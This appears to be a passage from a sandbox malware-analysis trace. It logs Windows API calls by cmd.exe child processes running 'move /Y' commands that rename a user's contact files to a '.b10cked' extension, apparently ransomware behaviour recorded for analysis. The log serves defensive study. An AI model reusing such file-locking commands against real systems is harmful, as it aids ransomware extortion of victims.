hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x0, lpData=0x24eb58*=0x1, lpcbData=0x24eb50*=0x1000) returned 0x2 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x4, lpData=0x24eb58*=0x0, lpcbData=0x24eb50*=0x4) returned 0x0 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x4, lpData=0x24eb58*=0x40, lpcbData=0x24eb50*=0x4) returned 0x0 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x4, lpData=0x24eb58*=0x40, lpcbData=0x24eb50*=0x4) returned 0x0 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x0, lpData=0x24eb58*=0x40, lpcbData=0x24eb50*=0x1000) returned 0x2 [0218.567] RegCloseKey (hKey=0x40) returned 0x0 [0218.567] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eb4c | out: phkResult=0x24eb4c*=0x40) returned 0x0 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x0, lpData=0x24eb58*=0x40, lpcbData=0x24eb50*=0x1000) returned 0x2 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x4, lpData=0x24eb58*=0x1, lpcbData=0x24eb50*=0x4) returned 0x0 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x0, lpData=0x24eb58*=0x1, lpcbData=0x24eb50*=0x1000) returned 0x2 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x4, lpData=0x24eb58*=0x0, lpcbData=0x24eb50*=0x4) returned 0x0 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x4, lpData=0x24eb58*=0x9, lpcbData=0x24eb50*=0x4) returned 0x0 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x4, lpData=0x24eb58*=0x9, lpcbData=0x24eb50*=0x4) returned 0x0 [0218.567] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24eb54, lpData=0x24eb58, lpcbData=0x24eb50*=0x1000 | out: lpType=0x24eb54*=0x0, lpData=0x24eb58*=0x9, lpcbData=0x24eb50*=0x1000) returned 0x2 [0218.567] RegCloseKey (hKey=0x40) returned 0x0 [0218.567] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b4 [0218.567] srand (_Seed=0x5b8863b4) [0218.567] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact.b10cked\"" [0218.567] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact.b10cked\"" [0218.568] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a005260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0218.568] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2f18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0218.568] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a010640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0218.568] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a010640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0218.568] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a010640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0218.568] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0218.568] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0218.568] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0218.568] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0218.568] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0218.568] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0218.568] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0218.568] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0218.568] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0218.568] GetEnvironmentStringsW () returned 0x2f22d0* [0218.568] FreeEnvironmentStringsW (penv=0x2f22d0) returned 1 [0218.568] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a010640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.568] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a010640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0218.568] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0218.568] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0218.568] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0218.569] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0218.569] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0218.569] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0218.569] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0218.569] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0218.569] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f918 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0218.569] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24f918, lpFilePart=0x24f914 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f914*="Desktop") returned 0x18 [0218.569] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0218.569] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f694 | out: lpFindFileData=0x24f694) returned 0x2f0010 [0218.569] FindClose (in: hFindFile=0x2f0010 | out: hFindFile=0x2f0010) returned 1 [0218.569] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f694 | out: lpFindFileData=0x24f694) returned 0x2f0010 [0218.569] FindClose (in: hFindFile=0x2f0010 | out: hFindFile=0x2f0010) returned 1 [0218.569] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f694 | out: lpFindFileData=0x24f694) returned 0x2f0010 [0218.569] FindClose (in: hFindFile=0x2f0010 | out: hFindFile=0x2f0010) returned 1 [0218.569] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0218.569] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0218.570] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0218.570] GetEnvironmentStringsW () returned 0x2f2af0* [0218.570] FreeEnvironmentStringsW (penv=0x2f2af0) returned 1 [0218.570] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a005260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0218.570] GetConsoleOutputCP () returned 0x1b5 [0218.570] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a004260 | out: lpCPInfo=0x4a004260) returned 1 [0218.570] GetUserDefaultLCID () returned 0x409 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a004950, cchData=8 | out: lpLCData=":") returned 2 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fa58, cchData=128 | out: lpLCData="0") returned 2 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fa58, cchData=128 | out: lpLCData="0") returned 2 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fa58, cchData=128 | out: lpLCData="1") returned 2 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a004940, cchData=8 | out: lpLCData="/") returned 2 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a004d80, cchData=32 | out: lpLCData="Mon") returned 4 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a004d40, cchData=32 | out: lpLCData="Tue") returned 4 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a004d00, cchData=32 | out: lpLCData="Wed") returned 4 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a004cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a004c80, cchData=32 | out: lpLCData="Fri") returned 4 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a004c40, cchData=32 | out: lpLCData="Sat") returned 4 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a004c00, cchData=32 | out: lpLCData="Sun") returned 4 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a004930, cchData=8 | out: lpLCData=".") returned 2 [0218.571] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a004920, cchData=8 | out: lpLCData=",") returned 2 [0218.572] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0218.572] GetConsoleTitleW (in: lpConsoleTitle=0x2e08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.573] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0218.573] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0218.573] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0218.573] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0218.573] _wcsicmp (_String1="move", _String2=")") returned 68 [0218.573] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0218.573] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0218.573] _wcsicmp (_String1="IF", _String2="move") returned -4 [0218.573] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0218.573] _wcsicmp (_String1="REM", _String2="move") returned 5 [0218.574] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0218.576] GetConsoleTitleW (in: lpConsoleTitle=0x24f750, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0218.576] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0218.576] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0218.576] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0218.576] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0218.576] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0218.576] _wcsicmp (_String1="move", _String2="CD") returned 10 [0218.576] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0218.576] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0218.576] _wcsicmp (_String1="move", _String2="REN") returned -5 [0218.576] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0218.576] _wcsicmp (_String1="move", _String2="SET") returned -6 [0218.576] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0218.576] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0218.576] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0218.576] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0218.576] _wcsicmp (_String1="move", _String2="MD") returned 11 [0218.576] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0218.576] _wcsicmp (_String1="move", _String2="RD") returned -5 [0218.576] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0218.576] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0218.576] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0218.576] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0218.576] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0218.576] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0218.577] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0218.577] _wcsicmp (_String1="move", _String2="VER") returned -9 [0218.577] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0218.577] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0218.577] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0218.577] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0218.577] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0218.577] _wcsicmp (_String1="move", _String2="START") returned -6 [0218.577] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0218.577] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0218.577] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0218.578] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.578] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0218.578] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f50c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f504, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24f504*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0218.578] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0218.578] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0218.578] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0218.578] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0218.579] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0218.579] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0218.579] _wcsicmp (_String1="IHNVBH~1.CON", _String2=".") returned 59 [0218.579] _wcsicmp (_String1="IHNVBH~1.CON", _String2="..") returned 59 [0218.580] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh~1.con")) returned 0x20 [0218.580] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2f1e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0218.580] SetErrorMode (uMode=0x0) returned 0x0 [0218.580] SetErrorMode (uMode=0x1) returned 0x0 [0218.580] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON", nBufferLength=0x104, lpBuffer=0x24ee94, lpFilePart=0x24ee7c | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON", lpFilePart=0x24ee7c*="IHNVBH~1.CON") returned 0x26 [0218.580] SetErrorMode (uMode=0x0) returned 0x1 [0218.580] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts" (normalized: "c:\\users\\eebsym5\\contacts")) returned 0x13 [0218.580] _wcsicmp (_String1="IHNVBH~1.CON", _String2=".") returned 59 [0218.580] _wcsicmp (_String1="IHNVBH~1.CON", _String2="..") returned 59 [0218.580] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh~1.con")) returned 0x20 [0218.580] SetErrorMode (uMode=0x0) returned 0x0 [0218.580] SetErrorMode (uMode=0x1) returned 0x0 [0218.580] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON", nBufferLength=0x104, lpBuffer=0x24f310, lpFilePart=0x24f0a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON", lpFilePart=0x24f0a8*="IHNVBH~1.CON") returned 0x26 [0218.580] SetErrorMode (uMode=0x0) returned 0x1 [0218.580] SetErrorMode (uMode=0x0) returned 0x0 [0218.580] SetErrorMode (uMode=0x1) returned 0x0 [0218.580] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact.b10cked", nBufferLength=0x104, lpBuffer=0x24f518, lpFilePart=0x24f0a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact.b10cked", lpFilePart=0x24f0a8*="ihnvbh euuncnh.contact.b10cked") returned 0x38 [0218.580] SetErrorMode (uMode=0x0) returned 0x1 [0218.581] SetLastError (dwErrCode=0x0) [0218.581] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact.b10cked" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact.b10cked")) returned 0xffffffff [0218.581] GetLastError () returned 0x2 [0218.581] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON", fInfoLevelId=0x1, lpFindFileData=0x24ea24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ea24) returned 0x2e0e68 [0218.581] FindNextFileW (in: hFindFile=0x2e0e68, lpFindFileData=0x24ea24 | out: lpFindFileData=0x24ea24) returned 0 [0218.581] GetLastError () returned 0x12 [0218.581] FindClose (in: hFindFile=0x2e0e68 | out: hFindFile=0x2e0e68) returned 1 [0218.582] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\IHNVBH~1.CON", fInfoLevelId=0x1, lpFindFileData=0x2f1bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2f1bd8) returned 0x2e0e68 [0218.582] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact.b10cked", nBufferLength=0x104, lpBuffer=0x24ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact.b10cked", lpFilePart=0x0) returned 0x38 [0218.582] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact", nBufferLength=0x104, lpBuffer=0x24ecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact", lpFilePart=0x0) returned 0x30 [0218.582] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact")) returned 0x20 [0218.582] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact"), lpNewFileName="C:\\Users\\EEBsYm5\\Contacts\\ihnvbh euuncnh.contact.b10cked" (normalized: "c:\\users\\eebsym5\\contacts\\ihnvbh euuncnh.contact.b10cked"), dwFlags=0x3) returned 1 [0218.583] FindClose (in: hFindFile=0x2e0e68 | out: hFindFile=0x2e0e68) returned 1 [0218.583] _vsnwprintf (in: _Buffer=0x4a005040, _BufferCount=0x103, _Format="%9d", _ArgList=0x24ec70 | out: _Buffer=" 1") returned 9 [0218.583] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.583] GetFileType (hFile=0x7) returned 0x2 [0218.583] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0218.583] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24ebfc | out: lpMode=0x24ebfc) returned 1 [0218.583] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.583] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24ec30 | out: lpConsoleScreenBufferInfo=0x24ec30) returned 1 [0218.583] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a014640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0218.584] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a014640, nSize=0x2000, Arguments=0x24ec70 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0218.584] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a014640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x24ec54, lpReserved=0x0 | out: lpBuffer=0x4a014640*, lpNumberOfCharsWritten=0x24ec54*=0x1a) returned 1 [0218.584] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.584] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0218.584] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.584] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0041ac | out: lpMode=0x4a0041ac) returned 1 [0218.584] _get_osfhandle (_FileHandle=0) returned 0x3 [0218.584] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0041b0 | out: lpMode=0x4a0041b0) returned 1 [0218.584] SetConsoleInputExeNameW () returned 0x1 [0218.584] GetConsoleOutputCP () returned 0x1b5 [0218.584] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a004260 | out: lpCPInfo=0x4a004260) returned 1 [0218.584] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.585] exit (_Code=0) Process: id = "566" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16cc0" os_pid = "0x694" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\OFHBNH~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32772 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32773 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32774 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32775 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 32776 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32777 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32778 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32779 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32780 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32781 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = 